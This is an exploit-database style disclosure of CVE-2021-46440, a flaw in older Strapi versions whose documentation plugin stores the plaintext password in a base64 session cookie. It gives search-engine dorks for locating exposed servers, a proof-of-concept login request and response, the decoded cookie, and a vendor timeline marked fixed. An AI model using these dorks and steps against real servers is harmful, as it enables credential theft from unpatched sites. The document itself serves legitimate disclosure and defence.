# Exploit Title: Strapi < 3.6.9 and < 4.1.5 DOCUMENTATION plugin - Storing Passwords in a Recoverable Format # Google Dork: intitle:"Welcome to your Strapi ap" # Shodan search: "X-Powered-By: Strapi <strapi.io>" # Date: 2022-03-30 # Exploit Author: Kitchaphan Singchai [idealphase] # Vendor Homepage: https://strapi.io/ # Software Link: https://github.com/strapi/strapi/releases # Vulnerable Version: < 3.6.9 and < 4.1.5 # Version: 3.6.8 # Tested on: Linux # CVE: CVE-2021-46440 # Description: Storing passwords in a recoverable format in the DOCUMENTATION plugin component of Strapi version prior 3.6.9 and prior 4.1.5 allows an attacker to access a victim's HTTP request, get the victim's cookie, perform a base64 decode on the victim's cookie, and obtain a plaintext password, leading to getting API documentation for further API attacks. # This CVE has been fixed via this Github pull request. - Change documentation auth cookie system (https://github.com/strapi/strapi/pull/12246) # PoC: [Request] POST /documentation/login HTTP/1.1 Host: 127.0.0.1:1337 ..[SNIP].. password=password [Response] HTTP/1.1 302 Found Set-Cookie: strapi.sid=eyJkb2N1bWVudGF0aW9uIjoicGFzc3dvcmQiLCJfZXhwaXJlIjoxNjQyNjg2NDQyNzc2LCJfbWF4QWdl Ijo4NjQwMDAwMH0=; path=/; httponly Set-Cookie: strapi.sid.sig=e-5j8FBY8RSWqjALRv2dlPT5_gw; path=/; httponly X-Powered-By: Strapi <strapi.io> ..[SNIP].. Redirecting to <a href="/documentation">/documentation</a>. Perform Base64 decoding and we got plaintext password in “documentation” json key as shown below. {"documentation":"password","_expire":1642686442776,"_maxAge":86400000} # Timeline: 19/Jan/2022 - Inform vulnerability to Strapi team 20/Jan/2022 - Strapi validate the issue and have found a fix that they plan to review, merge, and release ASAP. 8/Feb/2022 - Pull request created on Official Github strapi - Change documentation auth cookie system (https://github.com/strapi/strapi/pull/12246) 28/Mar/2022 - Reserved CVE-2021-46440 29/Mar/2022 - Reproduce vulnerability on v3.6.9 and v.4.1.5 [Status:Fixed]